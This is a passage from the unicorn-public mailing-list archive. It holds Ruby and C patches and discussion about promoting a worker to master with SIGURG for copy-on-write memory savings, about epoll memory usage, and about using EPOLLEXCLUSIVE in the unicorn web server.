  - Write the new worker number in the fake signal pipe (at the same time).

- worker: on `SIGURG` (should spawn a sibling):
  - Note: worker fake signals are processed after the current request is
    completed.
  - Run `before_fork` callback (MAYBE: need a special `before_refork`
    callback?)
  - create a pipe.
  - daemonize (fork twice so that the new process is attributed to the
    nearest `CHILD_SUBREAPER`, aka the original master).
  - wait for the first child to exit.
  - write into the pipe to signal the parent is dead.
  - Run `after_fork` callback (MAYBE: need a special `after_refork` callback?)

- new sibling after fork:
  - wait for the parent to exit (though the temporary pipe).
  - create a named pipe (`File.mkfifo`) at `$TMP/$WORKER_NUM.pipe`.
  - create a pidfile at `$TMP/WORKER_NUM.pid`.
  - Open the named pipe in `IO::RDONLY | IO::NONBLOCK` (otherwise it would
    block until the master open in write mode).
    - NB: Need to convert it to a `Kgio::Pipe` with
      `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` need `autoclose = false`.
  - Create the `Unicorn::Worker` instance with that pipe and worker number.
  - Send `SIGURG` to the parent process (should be the master).
  - Wait for `SIGCONT` in the named pipe.
  - enter the worker loop.

- master: on `SIGURG`:
  - for each outstanding refork order:
    - Look for `$TMP/$WORKER_NUM.pid` and `$TMP/$WORKER_NUM.pipe`
    - Read the pidfile
    - Open the pipe with `IO::RDONLY | IO::NONBLOCK`
      - NB: Need to convert it to a `Kgio::Pipe` with
        `Kgio::Pipe.for_fd(f.to_i)`, and keep `f` need `autoclose = false`.
    - Delete pidfile and named pipe.
    - Register that new worker normally.
    - Write `SIGCONT` into the pipe.

I can share the patch if you are interested, but the extra complexity
and Linux only features made me prefer the master-promotion approach.

> > However it work well enough for demonstration.
> >
> > So I figured I'd ask wether the feature is desired upstream
> > before investing more effort into it.
>
> It really depends on:
>
> 1) what memory savings and/or speedups can be achieved
>
> 2) what support can we expect from you (and other users) for
>    this feature and potential regressions going forward?
>
> I don't have the free time nor mental capacity to deal with
> fallout from major new features such as this, myself.

Yeah, this is just a RFC, I wouldn't submit a final patch without
first deploying it on our infra with good results. I'm just on the
fence between trying to get this upstream vs maintaining our own
server that solely work like this, hence somewhat simpler and that
can make more assumptions.

> The hook interface would be yet another documentation+support
> burden I'm worried about (and also more unicorn-specific stuff
> to lock people in :<).

Understandable. I suppose it can be done with a monitoring process.
Check `smaps_rollup` and send `SIGURG` when deemed necessary.

More moving pieces but keep unicorn simpler.

> A completely different idea which should achieve the same goal,
> completely independent of unicorn:
>
>   App startup/loading can be made to trigger warmup paths which
>   hit common endpoints.  IOW, app loading could run a small
>   warmup suite which simulates common requests to heat up caches
>   and trigger JIT.

Yeah, I don't really believe in this for a few reasons:

  - That would slow boot time.
  - On large apps there's just too many codepath for this to be realistic.
  - Many endpoints require database and other network access you probably
    don't want in the master.
  - Endpoints may have side effects.

> Ultimately (long-term for ruby-core), it would be better to make
> JIT (and perhaps even VM cache) results persistent and shareable
> across different processes, somehow...  That would help all Ruby
> tools, even short-lived CLI tools.  Portable locking would be a
> pain, I suppose, but proprietary OSes are always a pain :P

Based on my limited understanding of both JIT and VM caches, I don't think
that's really possible.

The VM itself could definitely do better CoW wise, and I have some proposals
on that front (https://bugs.ruby-lang.org/issues/18885) but that will take
time and will never be perfect.

That's why I think periodically promoting a new master has potential.

> There's some line-wrapping issues caused by your MUA;

Urk. Ok, trying another client now, and I'll resend the patch.

> Perhaps documenting this as experimental and subject to removal
> at any time would make the addition of a major new feature an
> easier pill to swallow; but I still think this is better outside
> of app servers.

Up to you, if you don't feel like maintaining such a feature I would
perfectly understand.

---
 SIGNALS                        |   4 ++
 lib/unicorn.rb                 |   2 +-
 lib/unicorn/http_server.rb     | 115 +++++++++++++++++++++++++--------
 lib/unicorn/promoted_worker.rb |  40 ++++++++++++
 4 files changed, 134 insertions(+), 27 deletions(-)
 create mode 100644 lib/unicorn/promoted_worker.rb

diff --git a/SIGNALS b/SIGNALS
index 7321f2b..f5716b9 100644
--- a/SIGNALS
+++ b/SIGNALS
@@ -39,6 +39,10 @@ https://yhbt.net/unicorn/examples/init.sh
 * WINCH - gracefully stops workers but keep the master running.
   This will only work for daemonized processes.

+* URG - promote one of the existing workers as a new master, and gracefully
+  stop workers.
+  This will only work for daemonized processes.
+
 * TTIN - increment the number of worker processes by one

 * TTOU - decrement the number of worker processes by one
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index 1a50631..832f78d 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -133,6 +133,6 @@ def self.pipe # :nodoc:
 # :enddoc:

 %w(const socket_helper stream_input tee_input http_request configurator
-   tmpio util http_response worker http_server).each do |s|
+   tmpio util http_response worker promoted_worker http_server).each do |s|
   require_relative "unicorn/#{s}"
 end
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 21f2a05..dd8f021 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -50,6 +50,7 @@ class Unicorn::HttpServer
   #   Unicorn::HttpServer::START_CTX[0] = "/home/bofh/2.3.0/bin/unicorn"
   START_CTX = {
     :argv => ARGV.map(&:dup),
+    :generation => 0,
     0 => $0.dup,
   }
   # We favor ENV['PWD'] since it is (usually) symlink aware for Capistrano
@@ -106,7 +107,7 @@ def initialize(app, options = {})
     @orig_app = app
     # list of signals we care about and trap in master.
     @queue_sigs = [
-      :WINCH, :QUIT, :INT, :TERM, :USR1, :USR2, :HUP, :TTIN, :TTOU ]
+      :WINCH, :QUIT, :INT, :TERM, :USR1, :USR2, :HUP, :TTIN, :TTOU, :URG ]

     @worker_data = if worker_data = ENV['UNICORN_WORKER']
       worker_data = worker_data.split(',').map!(&:to_i)
@@ -119,7 +120,24 @@ def initialize(app, options = {})

   # Runs the thing.  Returns self so you can run join on it
   def start
+    @new_master = false
     inherit_listeners!
+    promote
+
+    # write pid early for Mongrel compatibility if we're not inheriting sockets
+    # This is needed for compatibility some Monit setups at least.
+    # This unfortunately has the side effect of clobbering valid PID if
+    # we upgrade and the upgrade breaks during preload_app==true && build_app!
+    self.pid = config[:pid]
+
+    build_app! if preload_app
+    bind_new_listeners!
+
+    spawn_missing_workers
+    self
+  end
+
+  def promote
     # this pipe is used to wake us up from select(2) in #join when signals
     # are trapped.  See trap_deferred.
     @self_pipe.replace(Unicorn.pipe)
@@ -130,18 +148,6 @@ def start
     # Note that signals don't actually get handled until the #join method
     @queue_sigs.each { |sig| trap(sig) { @sig_queue << sig; awaken_master } }
     trap(:CHLD) { awaken_master }
-
-    # write pid early for Mongrel compatibility if we're not inheriting sockets
-    # This is needed for compatibility some Monit setups at least.
-    # This unfortunately has the side effect of clobbering valid PID if
-    # we upgrade and the upgrade breaks during preload_app==true && build_app!
-    self.pid = config[:pid]
-
-    build_app! if preload_app
-    bind_new_listeners!
-
-    spawn_missing_workers
-    self
   end

   # replaces current listener set with +listeners+.  This will
@@ -178,16 +184,16 @@ def logger=(obj)
     Unicorn::HttpRequest::DEFAULTS["rack.logger"] = @logger = obj
   end

-  def clobber_pid(path)
+  def clobber_pid(path, content = $$)
     unlink_pid_safe(@pid) if @pid
     if path
       fp = begin
-        tmp = "#{File.dirname(path)}/#{rand}.#$$"
+        tmp = "#{File.dirname(path)}/#{rand}.#{content}"
         File.open(tmp, File::RDWR|File::CREAT|File::EXCL, 0644)
       rescue Errno::EEXIST
         retry
       end
-      fp.syswrite("#$$\n")
+      fp.syswrite("#{content}\n")
       File.rename(fp.path, path)
       fp.close
     end
@@ -279,6 +285,11 @@ def join
       end
       @ready_pipe = @ready_pipe.close rescue nil
     end
+
+    if @promoted
+      Process.kill(:WINCH, Process.ppid)
+    end
+
     begin
       reap_all_workers
       case @sig_queue.shift
@@ -292,6 +303,13 @@ def join
           @logger.debug("waiting #{sleep_time}s after suspend/hibernation")
         end
         maintain_worker_count if respawn
+
+        if @new_master && @new_master.ready? && @workers.empty?
+          # TODO: we should handle the new master dying like with reexec.
+          clobber_pid(pid, @new_master.pid)
+          break
+        end
+
         master_sleep(sleep_time)
       when :QUIT # graceful shutdown
         break
@@ -305,10 +323,20 @@ def join
         soft_kill_each_worker(:USR1)
       when :USR2 # exec binary, stay alive in case something went wrong
         reexec
+      when :URG
+        if $stdin.tty?
+          logger.info "SIGURG ignored because we're not daemonized"
+        else
+          promote_new_master
+        end
       when :WINCH
         if $stdin.tty?
           logger.info "SIGWINCH ignored because we're not daemonized"
         else
+          if @new_master
+            @new_master.ready!
+          end
+
           respawn = false
           logger.info "gracefully stopping all workers"
           soft_kill_each_worker(:QUIT)
@@ -408,11 +436,30 @@ def reap_all_workers
         worker = @workers.delete(wpid) and worker.close rescue nil
         @after_worker_exit.call(self, worker, status)
       end
+
+      if @new_master && @new_master.ready?
+        @new_master.scale(@workers.size)
+      end
     rescue Errno::ECHILD
       break
     end while true
   end

+  def promote_new_master
+    # Promoting the oldest worker
+    # TODO: handle `@new_master` being dead.
+    if @new_master
+      logger.error "can't promote because worker=#{@new_master.nr} is
being promoted"
+    elsif pair = @workers.first
+      @new_master = Unicorn::PromotedWorker.new(*pair, worker_processes)
+      @workers.delete(@new_master.pid)
+      logger.info "master promoting worker=#{@new_master.worker.nr}"
+      @new_master.promote
+    else
+      logger.error "can't promote because there is no existing workers"
+    end
+  end
+
   # reexecutes the START_CTX with a new binary
   def reexec
     if @reexec_pid > 0
@@ -516,10 +563,11 @@ def murder_lazy_workers
   end

   def after_fork_internal
+    self.worker_processes = 0
     @self_pipe.each(&:close).clear # this is master-only, now
     @ready_pipe.close if @ready_pipe
     Unicorn::Configurator::RACKUP.clear
-    @ready_pipe = @init_listeners = @before_exec = @before_fork = nil
+    @ready_pipe = nil

     # The OpenSSL PRNG is seeded with only the pid, and apps with frequently
     # dying workers can recycle pids
@@ -545,6 +593,13 @@ def spawn_missing_workers
       unless pid
         after_fork_internal
         worker_loop(worker)
+
+        if @promoted
+          worker.tick = 0
+          promote
+          join
+        end
+
         exit
       end

@@ -678,19 +733,22 @@ def init_worker_process(worker)
     trap(:CHLD, 'DEFAULT')
     @sig_queue.clear
     proc_name "worker[#{worker.nr}]"
-    START_CTX.clear
     @workers.clear

     after_fork.call(self, worker) # can drop perms and create listeners
     LISTENERS.each { |sock| sock.close_on_exec = true }

     worker.user(*user) if user.kind_of?(Array) && ! worker.switched
-    @config = nil
     build_app! unless preload_app
-    @after_fork = @listener_opts = @orig_app = nil
+    @listener_opts = @orig_app = nil
     readers = LISTENERS.dup
     readers << worker
     trap(:QUIT) { nuke_listeners!(readers) }
+    @promoted = false
+    trap(:URG) do
+      @promoted = true
+      START_CTX[:generation] += 1
+    end
     readers
   end

@@ -706,11 +764,11 @@ def reopen_worker_logs(worker_nr)

   def prep_readers(readers)
     wtr = Unicorn::Waiter.prep_readers(readers)
-    @timeout *= 500 # to milliseconds for epoll, but halved
+    @select_timeout = @timeout * 500 # to milliseconds for epoll, but halved
     wtr
   rescue
     require_relative 'select_waiter'
-    @timeout /= 2.0 # halved for IO.select
+    @select_timeout = @timeout / 2.0 # halved for IO.select
     Unicorn::SelectWaiter.new
   end

@@ -720,7 +778,7 @@ def prep_readers(readers)
   def worker_loop(worker)
     readers = init_worker_process(worker)
     waiter = prep_readers(readers)
-    reopen = false
+    promote = reopen = false

     # this only works immediately if the master sent us the signal
     # (which is the normal case)
@@ -739,12 +797,17 @@ def worker_loop(worker)
           process_client(client)
           worker.tick = time_now.to_i
         end
+        if @promoted
+          worker.tick = time_now.to_i
+          return
+        end
+
         break if reopen
       end

       # timeout so we can .tick and keep parent from SIGKILL-ing us
       worker.tick = time_now.to_i
-      waiter.get_readers(ready, readers, @timeout)
+      waiter.get_readers(ready, readers, @select_timeout)
     rescue => e
       redo if reopen && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
@@ -823,8 +886,8 @@ def build_app!
   end

   def proc_name(tag)
-    $0 = ([ File.basename(START_CTX[0]), tag
-          ]).concat(START_CTX[:argv]).join(' ')
+    $0 = ([ File.basename(START_CTX[0]), tag, "(gen:
#{START_CTX[:generation]})",
+          ]).concat(START_CTX[:argv]).compact.join(' ')
   end

   def redirect_io(io, path)
diff --git a/lib/unicorn/promoted_worker.rb b/lib/unicorn/promoted_worker.rb
new file mode 100644
index 0000000..2595182
--- /dev/null
+++ b/lib/unicorn/promoted_worker.rb
@@ -0,0 +1,40 @@
+# -*- encoding: binary -*-
+
+class Unicorn::PromotedWorker
+  attr_reader :pid, :worker
+
+  def initialize(pid, worker, expected_worker_processes)
+    @pid = pid
+    @worker = worker
+    @worker_processes = 0
+    @expected_worker_processes = expected_worker_processes
+    @ready = false
+  end
+
+  def ready?
+    @ready
+  end
+
+  def ready!
+    @ready = true
+  end
+
+  def promote
+    @worker.soft_kill(:URG)
+  end
+
+  def scale(old_master_worker_processes)
+    diff = @expected_worker_processes -
+      old_master_worker_processes -
+      @worker_processes
+
+    if diff > 0
+      diff.times { kill(:TTIN) }
+      @worker_processes += diff
+    end
+  end
+
+  def kill(sig)
+    Process.kill(sig, @pid)
+  end
+end
-- 
2.35.1

^ permalink raw reply related	[relevance 1%]

* Re: [PATCH] Master promotion with SIGURG (CoW optimization)
  @ 2022-07-06  2:33  2% ` Eric Wong
  2022-07-06  7:40  1%   ` Jean Boussier
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2022-07-06  2:33 UTC (permalink / raw)
  To: Jean Boussier; +Cc: unicorn-public

Jean Boussier <jean.boussier@shopify.com> wrote:
> Unicorn rely on Copy on Write to limit applications' memory usage,
> however Ruby Copy on Write performance isn't exactly perfect.
> As code get executed various internal performance caches get warmed
> which cause shared pages to be invalidated.
> 
> While there's certainly some improvements to be made to Ruby itself
> on that front, it will likely get worse in the near future if YJIT
> become popular, as it will generate executable code in the workers
> hence won't be shared.
> 
> One way effective CoW performance could be improved would be to
> periodically promote one worker as the new master. Since that worker
> processed some requests, VM caches, JITed code, etc should be somewhat
> warm already, hence shared pages should be dirtied less frequently after
> each promotion.

Agreed, there's potential for savings, here...

> Puma 5.0.0 introduced a similar experimental feature called
> `fork_worker` or `refork`.
> 
> It's a bit more limited though, as instead of promoting a new
> master and exiting, they only ask worker #0 to fork itself to
> replace its siblings. So once all workers are replaces, there
> is 3 levels of processes: cluster -> first_worker -> other_workers.

OK, any numbers from Puma users which can be used to project
improvements for unicorn (and other servers)?

> They also include automatic reforking after a predetermined amount
> of requests (1k by default).

1k seems like a lot of requests (more on this below)

> The happy path works pretty much like this:
> 
> - Assume daemonized mode.
> 
> - master: on `SIGURG`
>   - Forward `SIGURG` to a chosen worker.

OK, I guess SIGURG is safe to use since nobody else relies on it (right?).

> - worker: on `SIGURG` (become a master)
>   - do the prep, register traps, open self-pipe, etc
>   - don't spawn any worker, set number of wokers to 0.
>   - send `SIGWHINCH` to master.
> 
> - old master: on `SIGWHINCH`
>   - Gracefully shutdown workers, like during a reexec.

nit: only one `H' in `SIGWINCH`

> - old master: when a worker is reaped.
>   - Send `SIGTTIN` to the new master
>   - If it was the last worker:
>     - replace pidfile
>     - exit
> 
> This patch is not exactly production quality yet:
> 
>   - I need to write some tests
>   - There's a race condition that can cause the promoted master
>     master to have one less worker than required. Need to be addressed.
>   - The pidfile replacement should be improved.
>   - Multiple corner cases like a `QUIT` during promotion are not handled.

Right.  PID file races and corner cases were painful to deal
with in the earliest days of this project, and I don't look
forward to having to deal with them ever again...

It looked like the world was moving towards socket-activation
with dedicated process managers and away from fragile PID files;
so being self-daemonization dependent seems like a step back.

> However it work well enough for demonstration.
> 
> So I figured I'd ask wether the feature is desired upstream
> before investing more effort into it.

It really depends on:

1) what memory savings and/or speedups can be achieved

2) what support can we expect from you (and other users) for
   this feature and potential regressions going forward?

I don't have the free time nor mental capacity to deal with
fallout from major new features such as this, myself.

> For this to be used in production without too much integration effort
> I think automatic promotion based on some criteria like number of
> request or process lifetime would be needed.
> 
> Ideally a hook interface to programatically trigger promotion would
> be very valuable as I'd likely want to trigger promotion
> based on memory metrics read from `/proc/<pid>/smaps_rollup`.

The hook interface would be yet another documentation+support
burden I'm worried about (and also more unicorn-specific stuff
to lock people in :<).


A completely different idea which should achieve the same goal,
completely independent of unicorn:

  App startup/loading can be made to trigger warmup paths which
  hit common endpoints.  IOW, app loading could run a small
  warmup suite which simulates common requests to heat up caches
  and trigger JIT.

  That would be completely self-contained in each app and work
  on every single app server; not just ones with special
  provisions to deal with this.  Of course, CoW-aware setups
  (preload_app) will still have the advantage, here.

  Best of all, it could be deterministic, too, instead of
  waiting and hoping 1k random requests will be sufficient
  warmup, developers can tune and mock exactly the requests
  required for warmup.  Of course, a lazy developer replay 1k
  requests from an old log, too.


Ultimately (long-term for ruby-core), it would be better to make
JIT (and perhaps even VM cache) results persistent and shareable
across different processes, somehow...  That would help all Ruby
tools, even short-lived CLI tools.  Portable locking would be a
pain, I suppose, but proprietary OSes are always a pain :P

>  4 files changed, 134 insertions(+), 27 deletions(-)
>  create mode 100644 lib/unicorn/promoted_worker.rb

There's some line-wrapping issues caused by your MUA;
I got this from "git am":

  warning: Patch sent with format=flowed; space at the end of lines might be lost.
  Applying: Master promotion with SIGURG (CoW optimization)
  error: corrupt patch at line 14

The git-format-patch(1) manpage has a section for Thunderbird users
which may help.

> --- a/SIGNALS
> +++ b/SIGNALS
> @@ -39,6 +39,10 @@ https://yhbt.net/unicorn/examples/init.sh
>  * WINCH - gracefully stops workers but keep the master running.
>    This will only work for daemonized processes.
> 
> +* URG - promote one of the existing workers as a new master, and gracefully
> +  stop workers.
> +  This will only work for daemonized processes.

Perhaps documenting this as experimental and subject to removal
at any time would make the addition of a major new feature an
easier pill to swallow; but I still think this is better outside
of app servers.

^ permalink raw reply	[relevance 2%]

* Re: DKIM+DMARC enabled (for mailing list subscribers)
  @ 2022-06-22  8:44  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2022-06-22  8:44 UTC (permalink / raw)
  To: unicorn-public

Eric Wong <e@80x24.org> wrote:
> This message is only for SMTP subscribers; not anybody reading
> via HTTP(S), IMAP(S), or NNTP(S).

ditto...

> I had some bounces earlier due to DMARC for two (of many)
> recipients; so I'm adding incompressible header bloat via DKIM :<
> in the hopes that it appeases the big email cartels.

Not sure DMARC is still a problem, but I also got a new IP address
(64.71.152.64 -> 173.255.242.215) for the MX this goes out of
(still dcvr.yhbt.net, same VM, just forced network change from
provider after 14 years...)

^ permalink raw reply	[relevance 3%]

* Re: Memory usage enhancement in unicorn 6.1?
  2022-01-23 16:10  4% Memory usage enhancement in unicorn 6.1? Toshimaru Enomoto
@ 2022-02-16 22:39  0% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2022-02-16 22:39 UTC (permalink / raw)
  To: Toshimaru Enomoto; +Cc: unicorn-public

Toshimaru Enomoto <me@toshimaru.net> wrote:
> Hi,
> 
> After bumping unicorn from 6.0 to 6.1,
> I observed it reduced memory usage much.
> 
> In production, the memory usage has been almost halved! :0
> Startup memory usage is almost the same, but after a few minutes,
> there is a big difference in the memory usage between v6.0 and v6.1.
> 
> I looked into the cause of this and I found using epoll reduces memory usage.
> https://gist.github.com/toshimaru/c33cfdb2e1b2540ff0481092e8c36745

Quoting the lynx dump of above gist:
> Environment
> 
>      * Ruby 3.1 (ruby:3.1 docker image)
>      * unicorn 6.1
>      * Rails 6.1
> 
> Workload
> 
>      * Run unicorn with 4 worker processes
>      * Request 100 times to unicorn app
> 
> unicorn 6.1 without epoll
> 
>   def prep_readers(readers)
> -   wtr = Unicorn::Waiter.prep_readers(readers)
> -   @timeout *= 500 # to milliseconds for epoll, but halved
> -   wtr
> - rescue
>     require_relative 'select_waiter'
>     @timeout /= 2.0 # halved for IO.select
>     Unicorn::SelectWaiter.new
>   end
> 
> # free -h # before 100 requests
>                total        used        free      shared  buff/cache   available
> Mem:           1.9Gi       805Mi       169Mi       199Mi       1.0Gi       797Mi
> Swap:          1.0Gi       155Mi       868Mi
> 
> # free -h # after 100 requests
>                total        used        free      shared  buff/cache   available
> Mem:           1.9Gi       943Mi        85Mi       192Mi       956Mi       670Mi
> Swap:          1.0Gi       163Mi       860Mi
> 
> unicorn 6.1 with epoll
> 
>   def prep_readers(readers)
>     wtr = Unicorn::Waiter.prep_readers(readers)
>     @timeout *= 500 # to milliseconds for epoll, but halved
>     wtr
> - rescue
> -   require_relative 'select_waiter'
> -   @timeout /= 2.0 # halved for IO.select
> -   Unicorn::SelectWaiter.new
>   end
> 
> # free -h # before 100 requests
>                total        used        free      shared  buff/cache   available
> Mem:           1.9Gi       802Mi       160Mi       192Mi       1.0Gi       811Mi
> Swap:          1.0Gi       163Mi       860Mi
> # free -h # after 100 requests
>                total        used        free      shared  buff/cache   available
> Mem:           1.9Gi       805Mi       156Mi       192Mi       1.0Gi       808Mi
> Swap:          1.0Gi       163Mi       860Mi
> 
> Does anyone observe the same enhancement?

I haven't seen it, nor is it expected...
Note: free(1) may be misleading if other processes are active.

What do the VSZ and RSS columns of "ps aux" say?

> Or does anyone have an idea why it happened?

Nobody else responded, so I guess not.

How complex is your application w.r.t memory allocations?  The
epoll code path may use fewer allocations and stack than
IO.select, but I figured it'd be lost in the noise since most
applications do a lot more allocations.

Btw, please don't use gist or similar services for small text
that can easily be inlined w/o HTML/JS overhead on websites.
Some users download and read mail offline; requiring extra network
round-trips decreases the likelyhood your messages will be read.
My mindset as a GNU/Linux hacker remains optimizing everything
for i486 users on dialup :)

^ permalink raw reply	[relevance 0%]

* Memory usage enhancement in unicorn 6.1?
@ 2022-01-23 16:10  4% Toshimaru Enomoto
  2022-02-16 22:39  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Toshimaru Enomoto @ 2022-01-23 16:10 UTC (permalink / raw)
  To: unicorn-public

Hi,

After bumping unicorn from 6.0 to 6.1,
I observed it reduced memory usage much.

In production, the memory usage has been almost halved! :0
Startup memory usage is almost the same, but after a few minutes,
there is a big difference in the memory usage between v6.0 and v6.1.

I looked into the cause of this and I found using epoll reduces memory usage.
https://gist.github.com/toshimaru/c33cfdb2e1b2540ff0481092e8c36745

Does anyone observe the same enhancement?
Or does anyone have an idea why it happened?

Thanks,
Toshi

^ permalink raw reply	[relevance 4%]

* [PATCH 0/3] Ruby 3.1 + doc/URL updates...
@ 2021-12-25 17:41  3% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2021-12-25 17:41 UTC (permalink / raw)
  To: unicorn-public

All tested on some of the same HW I had in 2008/2009 :>

Bozo Doofus For Life (3):
  epollexclusive: remove rb_gc_force_recycle call
  drop Ruby version warning, fix speling errer
  doc: v3 .onion updates, nntp => nntps, minor wording changes

 .olddoc.yml                       | 11 +++++----
 CONTRIBUTORS                      |  8 +++++--
 ISSUES                            | 38 +++++++++++++++----------------
 README                            |  8 +++----
 ext/unicorn_http/epollexclusive.h |  1 -
 ext/unicorn_http/extconf.rb       |  5 ----
 unicorn.gemspec                   |  2 +-
 7 files changed, 36 insertions(+), 37 deletions(-)

^ permalink raw reply	[relevance 3%]

* [PATCH 6/6] use EPOLLEXCLUSIVE on Linux 4.5+
  @ 2021-10-01  3:09  1% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2021-10-01  3:09 UTC (permalink / raw)
  To: unicorn-public

While the capabilities of epoll cannot be fully exploited given
our primitive design; avoiding thundering herd wakeups on larger
SMP machines while below 100% utilization is possible with
Linux 4.5+.

With this change, only one worker wakes up per-connect(2)
(instead of all of them via select(2)), avoiding the thundering
herd effect when the system is mostly idle.

Saturated instances should not notice the difference if they
rarely had multiple workers sleeping in select(2).  This change
benefits non-saturated instances.

With 2 parallel clients and 8 workers on a nominally (:P)
8-core CPU (AMD FX-8320), the uconnect.perl test script
invocation showed a reduction from ~3.4s to ~2.5s when
reading an 11-byte response body:

  echo worker_processes 8 >u.conf.rb
  bs=11 ruby -I lib -I test/ruby-2.5.5/ext/unicorn_http/ bin/unicorn \
    test/benchmark/dd.ru -E none -l /tmp/u.sock -c u.conf.rb
  time perl -I lib -w test/benchmark/uconnect.perl \
    -n 100000 -c 2 /tmp/u.sock

Times improve less as "-c" increases for uconnect.perl (system
noise and timings are inconsistent).  The benefit of this change
should be more noticeable on systems with more workers (and
more cores).

I wanted to use EPOLLET (Edge-Triggered) to further reduce
syscalls, here, (similar to the old select()-avoidance bet) but
that would've either added too much complexity to deduplicate
wakeup sources, or run into the same starvation problem we
solved in April 2020[1].

Since the kernel already has the complexity and deduplication
built-in for Level-Triggered epoll support, we'll just let the
kernel deal with it.

Note: do NOT take this as an example of how epoll should be used
in a sophisticated server.  unicorn is primitive by design and
cannot use threads nor handle multiple clients at once, thus it
it only uses epoll in this extremely limited manner.

Linux 4.5+ users will notice a regression of one extra epoll FD
per-worker and at least two epoll watches, so
/proc/sys/fs/epoll/max_user_watches may need to be changed along
with RLIMIT_NOFILE.

This change has also been tested on Linux 3.10.x (CentOS 7.x)
and FreeBSD 11.x to ensure compatibility with systems without
EPOLLEXCLUSIVE.

Various EPOLLEXCLUSIVE discussions over the years:
  https://yhbt.net/lore/lkml/?q=s:EPOLLEXCLUSIVE+d:..20211001&x=t&o=-1

[1] https://yhbt.net/unicorn-public/CAMBWrQ=Yh42MPtzJCEO7XryVknDNetRMuA87irWfqVuLdJmiBQ@mail.gmail.com/
---
 ext/unicorn_http/epollexclusive.h | 125 ++++++++++++++++++++++++++++++
 ext/unicorn_http/extconf.rb       |   1 +
 ext/unicorn_http/unicorn_http.rl  |   3 +
 lib/unicorn/http_server.rb        |  17 +++-
 lib/unicorn/select_waiter.rb      |   6 ++
 t/test-lib.sh                     |   3 +-
 test/unit/test_waiter.rb          |  34 ++++++++
 7 files changed, 184 insertions(+), 5 deletions(-)
 create mode 100644 ext/unicorn_http/epollexclusive.h
 create mode 100644 lib/unicorn/select_waiter.rb
 create mode 100644 test/unit/test_waiter.rb

diff --git a/ext/unicorn_http/epollexclusive.h b/ext/unicorn_http/epollexclusive.h
new file mode 100644
index 0000000..2d2a589
--- /dev/null
+++ b/ext/unicorn_http/epollexclusive.h
@@ -0,0 +1,125 @@
+/*
+ * This is only intended for use inside a unicorn worker, nowhere else.
+ * EPOLLEXCLUSIVE somewhat mitigates the thundering herd problem for
+ * mostly idle processes since we can't use blocking accept4.
+ * This is NOT intended for use with multi-threaded servers, nor
+ * single-threaded multi-client ("C10K") servers or anything advanced
+ * like that.  This use of epoll is only appropriate for a primitive,
+ * single-client, single-threaded servers like unicorn that need to
+ * support SIGKILL timeouts and parent death detection.
+ */
+#if defined(HAVE_EPOLL_CREATE1)
+#  include <sys/epoll.h>
+#  include <errno.h>
+#  include <ruby/io.h>
+#  include <ruby/thread.h>
+#endif /* __linux__ */
+
+#if defined(EPOLLEXCLUSIVE) && defined(HAVE_EPOLL_CREATE1)
+#  define USE_EPOLL (1)
+#else
+#  define USE_EPOLL (0)
+#endif
+
+#if USE_EPOLL
+/*
+ * :nodoc:
+ * returns IO object if EPOLLEXCLUSIVE works and arms readers
+ */
+static VALUE prep_readers(VALUE cls, VALUE readers)
+{
+	long i;
+	int epfd = epoll_create1(EPOLL_CLOEXEC);
+	VALUE epio;
+
+	if (epfd < 0) rb_sys_fail("epoll_create1");
+
+	epio = rb_funcall(cls, rb_intern("for_fd"), 1, INT2NUM(epfd));
+
+	Check_Type(readers, T_ARRAY);
+	for (i = 0; i < RARRAY_LEN(readers); i++) {
+		int rc;
+		struct epoll_event e;
+		rb_io_t *fptr;
+		VALUE io = rb_ary_entry(readers, i);
+
+		e.data.u64 = i; /* the reason readers shouldn't change */
+
+		/*
+		 * I wanted to use EPOLLET here, but maintaining our own
+		 * equivalent of ep->rdllist in Ruby-space doesn't fit
+		 * our design at all (and the kernel already has it's own
+		 * code path for doing it).  So let the kernel spend
+		 * cycles on maintaining level-triggering.
+		 */
+		e.events = EPOLLEXCLUSIVE | EPOLLIN;
+		io = rb_io_get_io(io);
+		GetOpenFile(io, fptr);
+		rc = epoll_ctl(epfd, EPOLL_CTL_ADD, fptr->fd, &e);
+		if (rc < 0) rb_sys_fail("epoll_ctl");
+	}
+	return epio;
+}
+#endif /* USE_EPOLL */
+
+#if USE_EPOLL
+struct ep_wait {
+	struct epoll_event *events;
+	rb_io_t *fptr;
+	int maxevents;
+	int timeout_msec;
+};
+
+static void *do_wait(void *ptr) /* runs w/o GVL */
+{
+	struct ep_wait *epw = ptr;
+
+	return (void *)(long)epoll_wait(epw->fptr->fd, epw->events,
+				epw->maxevents, epw->timeout_msec);
+}
+
+/* :nodoc: */
+/* readers must not change between prepare_readers and get_readers */
+static VALUE
+get_readers(VALUE epio, VALUE ready, VALUE readers, VALUE timeout_msec)
+{
+	struct ep_wait epw;
+	long i, n;
+	VALUE buf;
+
+	Check_Type(ready, T_ARRAY);
+	Check_Type(readers, T_ARRAY);
+	epw.maxevents = RARRAY_LENINT(readers);
+	buf = rb_str_buf_new(sizeof(struct epoll_event) * epw.maxevents);
+	epw.events = (struct epoll_event *)RSTRING_PTR(buf);
+	epio = rb_io_get_io(epio);
+	GetOpenFile(epio, epw.fptr);
+
+	epw.timeout_msec = NUM2INT(timeout_msec);
+	n = (long)rb_thread_call_without_gvl(do_wait, &epw, RUBY_UBF_IO, NULL);
+	if (n < 0) {
+		if (errno != EINTR) rb_sys_fail("epoll_wait");
+		n = 0;
+	}
+	/* Linux delivers events in order received */
+	for (i = 0; i < n; i++) {
+		struct epoll_event *ev = &epw.events[i];
+		VALUE obj = rb_ary_entry(readers, ev->data.u64);
+
+		if (RTEST(obj))
+			rb_ary_push(ready, obj);
+	}
+	rb_str_resize(buf, 0);
+	rb_gc_force_recycle(buf);
+	return Qfalse;
+}
+#endif /* USE_EPOLL */
+
+static void init_epollexclusive(VALUE mUnicorn)
+{
+#if USE_EPOLL
